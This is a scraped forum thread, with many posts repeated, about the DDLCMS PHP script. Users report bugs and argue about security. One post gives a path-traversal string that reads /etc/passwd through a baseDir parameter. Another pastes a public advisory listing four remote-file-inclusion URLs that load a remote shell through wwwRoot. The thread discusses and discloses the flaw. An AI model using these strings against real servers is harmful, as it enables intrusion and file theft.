DDLCMS question?
- Thread starter Orange
- Start date
- Status
69 comments
Its been recently released and bugs are being reported and fixed I would give it a few weeks before I would consider it "stable". Try WCDDL as its more stable, personally I stay away from recently released scripts as they often have not been tested for exploits/bugs thoroughly.
Little Dragon
Active Member
Version 1.0, which is beta, is now stable. Version 1.1, with a host of new features will be released in a few weeks.
If you download the distro now, you will get a stable version, 5 new skins are done and will be uploaded soon. Custom skins can be done based on user preference, by request, for a cost -- except if your site is already a medium to high traffic site, we will make a custom skin for you, for free.
Of course the script is *fully customizable* with the ability to turn ON/OFF any of the modules (demo site www.coolddl.net is a custom skin, with all modules turned ON).
If you download the distro now, you will get a stable version, 5 new skins are done and will be uploaded soon. Custom skins can be done based on user preference, by request, for a cost -- except if your site is already a medium to high traffic site, we will make a custom skin for you, for free.
Of course the script is *fully customizable* with the ability to turn ON/OFF any of the modules (demo site www.coolddl.net is a custom skin, with all modules turned ON).
I just installed this and am pretty impressed.
The fact you need to chown files after auto install is pretty annoying though, also i noticed if you use the "template" category it will mess up the template a bit at the top in the search as it makes the selection box too wide.
Also the auto submitter appears to replace/remove & from links which is no good.
Am really looking forward to the update, and the skins your talking about, are they free?
And can you give a list of features/improvements for next release yet?
Anyway thanks for a great script
The fact you need to chown files after auto install is pretty annoying though, also i noticed if you use the "template" category it will mess up the template a bit at the top in the search as it makes the selection box too wide.
Also the auto submitter appears to replace/remove & from links which is no good.
Am really looking forward to the update, and the skins your talking about, are they free?
And can you give a list of features/improvements for next release yet?
Anyway thanks for a great script
Little Dragon
Active Member
*sigh* more disrespect and shameless bashing of my script from JmZ. It's not "full of exploits" Jmz -- and so what if there was, I'm working on my shyt and don't need your comments -- go "lol" at something else and find something productive to do.
I just installed this and am pretty impressed.
The fact you need to chown files after auto install is pretty annoying though, also i noticed if you use the "template" category it will mess up the template a bit at the top in the search as it makes the selection box too wide.
Also the auto submitter appears to replace/remove & from links which is no good.
Am really looking forward to the update, and the skins your talking about, are they free?
And can you give a list of features/improvements for next release yet?
Anyway thanks for a great script
Thanks for the comments bro. B-) The minor bugs you reported were fixed and a shyt load of features have been added to the new release. The skins will be free, all of them (the structure of the new release is a bit different, so they will be compatible with it), and will released with the new distro, at the same time.
I am working on compiling the list of features and improvements -- the minor "update/bug fix" turned out to be quite huge, so the list of added features and improvements are massive -- pretty much answered everyone's questions, bug report, and feature request (well, 98% of them anyways) including the following:
- code encryption removal
- download reporting system (5 stars)
- site rating system (VIP system)
- turn on/off autoresponder emails
- "Top ## Files" are now numbered
- Can change both username and password
- Added new categories
- additional advertising blocks
- katz-friendly submit pages, pre-approved by katz
- same for phaze submit pages
- more customization and versatility
- enhanced security
- database normalized and even more efficient than before
- all reported bugs
Sorry, no date set for release yet, currently, it's in testing!
Hey Dragon ill talk more with you when i can get a chance but you need to secure the script just a wee bit more i noticed you had added mcrypt nice thought
But there are a lot of the scripts asking Get and include in the script which can be very bad exploiting wise if you notice for example i dont reamember it off the top of my head as i have it saved on my other os and im on linux right now but i think its
/photos/
something that starts with a /p lol anyways
/p-something/xxxindex.php?baseDir=[ exploit code] LFI will execute against this but you have to do it a certain way the mcrypt blocks normal transversial such as
/p-something/xxxindex.php?baseDir=[../../../../../../etc/passwd]
baseDir seems to be the most affected one as it is calling all the main variables such as config wwwRoot and so forth.
Perhpas a bit more security on that will be great
But there are a lot of the scripts asking Get and include in the script which can be very bad exploiting wise if you notice for example i dont reamember it off the top of my head as i have it saved on my other os and im on linux right now but i think its
/photos/
something that starts with a /p lol anyways
/p-something/xxxindex.php?baseDir=[ exploit code] LFI will execute against this but you have to do it a certain way the mcrypt blocks normal transversial such as
/p-something/xxxindex.php?baseDir=[../../../../../../etc/passwd]
baseDir seems to be the most affected one as it is calling all the main variables such as config wwwRoot and so forth.
Perhpas a bit more security on that will be great
JmZ you can not expect one to be perfect in all for example lets take a Police Officer his main task is to protect us and then we have the hacker which does illegal use of the pc
now the polie officers thoughts and ideas are beyond the scope of hacking methodology
so he decides to make a script and publishes and there is a exploit in it should we blame him for the lack of him not know hacking methodology?
no we should not we all specialize in different aspects of life Little Dragon might be good at this as you might good at something else does that make you better or not? that's reportorial btw.
now the polie officers thoughts and ideas are beyond the scope of hacking methodology
so he decides to make a script and publishes and there is a exploit in it should we blame him for the lack of him not know hacking methodology?
no we should not we all specialize in different aspects of life Little Dragon might be good at this as you might good at something else does that make you better or not? that's reportorial btw.
Its only the first version though and has a lot of features, it bound to have some teething problems but its a far more complete script than ANYTHING out there now, i have tried them all.
Why not help rather than saying "its your own fault if you can't find them" ??
Why not help rather than saying "its your own fault if you can't find them" ??
Little Dragon
Active Member
@ William: Thanks for the report bro. It has been forwarded to the dev. team to see if it is an issue and if it is, it will be addressed and fixed.
So, Jmz, what's your point? What are you trying to accomplish? Nevermind, dont' bother answering, I'm sick of seeing your ignorant replies to my work.
I'd rather hear from people like William who actually try to HELP me and everyone else out with the development of this script. If you don't want to help, then once again I say, go find something productive to do.
Yeah, right. [JmZ, do me a favour and hover your mouse cursor over this smiley <_<]
DEViANCE, thanks for the comments. Well said bro
Thanks CyberHack, that's the goal. It will indeed rock!
Edit: It appears that the exploit you reported is not an exploit of the script itself, but rather, a server setting, namely, allow_url_include.
If a server has allow_url_include set to "On", that is a security risk, for any script. Here is the response from the dev team:
"if they've got allow_url_include turned on, this is a huge problem. The script really can't be responsible for their misconfigurations.
This exploit for misconfigured servers has been removed in the latest release of
this script. "
So, even if a server is misconfigured, the script still blocks the so-called exploit, so it's been fixed already Thanks for the heads up though, I love it when people try to help, so it's much appreciated William!
If a server has allow_url_include set to "On", that is a security risk, for any script. Here is the response from the dev team:
"if they've got allow_url_include turned on, this is a huge problem. The script really can't be responsible for their misconfigurations.
This exploit for misconfigured servers has been removed in the latest release of
this script. "
So, even if a server is misconfigured, the script still blocks the so-called exploit, so it's been fixed already
Thanks for the heads up though, I love it when people try to help, so it's much appreciated William!
If you aren't trying to bash my script, then what are you trying to do? Help me? Like the others who have provided useful information and have given me suggestions and such? Who are you trying to fool? No one on this board I bet (except yourself).
So, Jmz, what's your point? What are you trying to accomplish? Nevermind, dont' bother answering, I'm sick of seeing your ignorant replies to my work.
I'd rather hear from people like William who actually try to HELP me and everyone else out with the development of this script. If you don't want to help, then once again I say, go find something productive to do.
Yeah, right. [JmZ, do me a favour and hover your mouse cursor over this smiley <_<]
DEViANCE, thanks for the comments. Well said bro
Thanks CyberHack, that's the goal. It will indeed rock!
I love it when I get quoted so many times.
I posted here saying it contains exploits, because it does.
As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
I posted here saying it contains exploits, because it does.
As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
That makes sence but are there any servers that actually have that setting on??
I don't like the way it is using a number to count the path (or however it works), and even worse that it is hardcoded.. it seems like a strange method.
But back to that exploit here it is:
Code:
+============================================================+
| |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
| |
+============================================================+
| |
| Author : HxH |
| |
| E-Mail : HxH[at]live[dot]at |
| |
+------------------------------------------------------------+
| |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip |
| |
+------------------------------------------------------------+
| |
| Exploit : |
| |
| /header.php?wwwRoot=[Shell.txt?] |
| |
| /submit.php?wwwRoot=[Shell.txt?] |
| |
| /submitted.php?wwwRoot=[Shell.txt?] |
| |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?] |
| |
+============================================================+
| |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
| |
+============================================================+
# milw0rm.com [2009-09-21]Seriously though if we all work together and try and fix any problems the script will be great.
DEViANCE: PHP 5.3 has it disabled by default i think, 5.2 or 5.1 may have it enabled. PHP4 doesn't even have the option as far as I know, meaning all PHP4 servers are vulnerable I suppose.
As for working together to fix the problems, it's his script and his responsibility. It's just a script, the coders can and will fix it themselves (eventually).
As for working together to fix the problems, it's his script and his responsibility. It's just a script, the coders can and will fix it themselves (eventually).
- Status